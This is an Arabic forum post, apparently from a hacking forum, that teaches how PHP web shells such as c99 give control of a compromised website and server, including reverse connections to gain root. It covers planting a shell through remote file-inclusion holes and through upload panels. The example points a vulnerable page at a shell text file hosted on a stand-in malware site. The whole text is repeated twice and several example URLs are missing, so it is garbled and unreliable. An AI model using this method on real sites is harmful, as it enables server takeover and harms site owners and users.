الرئيسية
بسم الله الرحمن الرحيم
قررت كتابة هذا الموضوع لكثرة السؤال عن الشل وترييح أخوانا من شرح الشل في مواضيع كثير
ملاحظه أقصد هنا الشل هو السكربت الخاص باختراق المواقع وليس الشل الخاص باوامر اللينكس .
الشل عبارة عن سكربت مكتوب باحد لغات البرمجه بالغالب تكون php وقد تكون غيرها
وظيفة الشل :
يقوم الشل بعد رفعه للموقع بالتحكم الكامل بالسيرفر (طبعا على حسب حماية السيرفر و الموقع )
حيث من خلاله تستطيع قراءة وتعديل جميع الملفات على المواقع و احيانا على السيرفر(حسب حماية السيرفر والموقع )
وتعديل التصاريح والاتصال بقواعد البيانات وحتى الاتصال العكسي بالسيرفر لاخذ ro0t اي المدير على السيرفر
وللشل وظائف عديده جدا ويختلف من شل الى شل بالخصائص و الميزات
أنصحك لتعرف عن الشل ان تجربه على جهازك بعد تركيب سيرفر شخصي لتعرف قوة السيرفر وماذا يفعل بالموقع
و السيرفر .
كيفيت رفع الشل :
للشل طريقتان :
الاولى عن طريق ثغرات الفايل أنكلود .
الثانيه عن طريق لوحات التحكم التي تسمح لك برفع الشل.
ما هي ثغرات فايل انلكود:
لا اريد ان طيل عليكم وشرح لغة php لكي تفهما رغم اني انصح من يريد تعلم الهكر تعلم php
ببساطه هي ثغرات تمكنك من ربط الشل الخاص بك الذي من المفتراض ان يكون رافعه على احد المواقع المجانيه
بصفحه التي فيها ثغرة عن طريق متغير في الصفحه
مثال بسيط للتوضيح فقط
لنفترض ان الموق الذي وجد فيه ثغرت فايل انكلود هو
حيث الصفحه التي فيها المتغير هي مثلا
و المتغير الذي نستطيع ربط الشل به هو
مثلا
تكون الصفحه هكذا
لا حظ علامة ال يجب ان توضع
لان نربط الشل الخاص الذي من المفترض ان يكون هكذا
google.com/er.php?skaka
skaka.malware-site.www/c99.txt
لاحظ المتداد txt
الان نربط الشل بلصفحه وتكون هكذا
لاحظ علامة ال في الاخير (يجب ان تكون علامة ال في اخر اليمين لاكن الانه المنتدى ذو واجهه عربي)
'طبعا هذا الشرح لتوضيح فقط ثغرات الفايل انكلود
اما الطريقه الثانيه في لا تحتاج شرح فقط أرفع الشل بصيغة php من خلال لوحة التحكم السكربت الذي وجد فيه ثغرة
قررت كتابة هذا الموضوع لكثرة السؤال عن الشل وترييح أخوانا من شرح الشل في مواضيع كثير
ملاحظه أقصد هنا الشل هو السكربت الخاص باختراق المواقع وليس الشل الخاص باوامر اللينكس .
الشل عبارة عن سكربت مكتوب باحد لغات البرمجه بالغالب تكون php وقد تكون غيرها
وظيفة الشل :
يقوم الشل بعد رفعه للموقع بالتحكم الكامل بالسيرفر (طبعا على حسب حماية السيرفر و الموقع )
حيث من خلاله تستطيع قراءة وتعديل جميع الملفات على المواقع و احيانا على السيرفر(حسب حماية السيرفر والموقع )
وتعديل التصاريح والاتصال بقواعد البيانات وحتى الاتصال العكسي بالسيرفر لاخذ ro0t اي المدير على السيرفر
وللشل وظائف عديده جدا ويختلف من شل الى شل بالخصائص و الميزات
أنصحك لتعرف عن الشل ان تجربه على جهازك بعد تركيب سيرفر شخصي لتعرف قوة السيرفر وماذا يفعل بالموقع
و السيرفر .
كيفيت رفع الشل :
للشل طريقتان :
الاولى عن طريق ثغرات الفايل أنكلود .
الثانيه عن طريق لوحات التحكم التي تسمح لك برفع الشل.
ما هي ثغرات فايل انلكود:
لا اريد ان طيل عليكم وشرح لغة php لكي تفهما رغم اني انصح من يريد تعلم الهكر تعلم php
ببساطه هي ثغرات تمكنك من ربط الشل الخاص بك الذي من المفتراض ان يكون رافعه على احد المواقع المجانيه
بصفحه التي فيها ثغرة عن طريق متغير في الصفحه
مثال بسيط للتوضيح فقط
لنفترض ان الموق الذي وجد فيه ثغرت فايل انكلود هو
حيث الصفحه التي فيها المتغير هي مثلا
و المتغير الذي نستطيع ربط الشل به هو
مثلا
تكون الصفحه هكذا
لا حظ علامة ال يجب ان توضع
لان نربط الشل الخاص الذي من المفترض ان يكون هكذا
google.com/er.php?skaka
skaka.malware-site.www/c99.txt
لاحظ المتداد txt
الان نربط الشل بلصفحه وتكون هكذا
لاحظ علامة ال في الاخير (يجب ان تكون علامة ال في اخر اليمين لاكن الانه المنتدى ذو واجهه عربي)
'طبعا هذا الشرح لتوضيح فقط ثغرات الفايل انكلود
اما الطريقه الثانيه في لا تحتاج شرح فقط أرفع الشل بصيغة php من خلال لوحة التحكم السكربت الذي وجد فيه ثغرة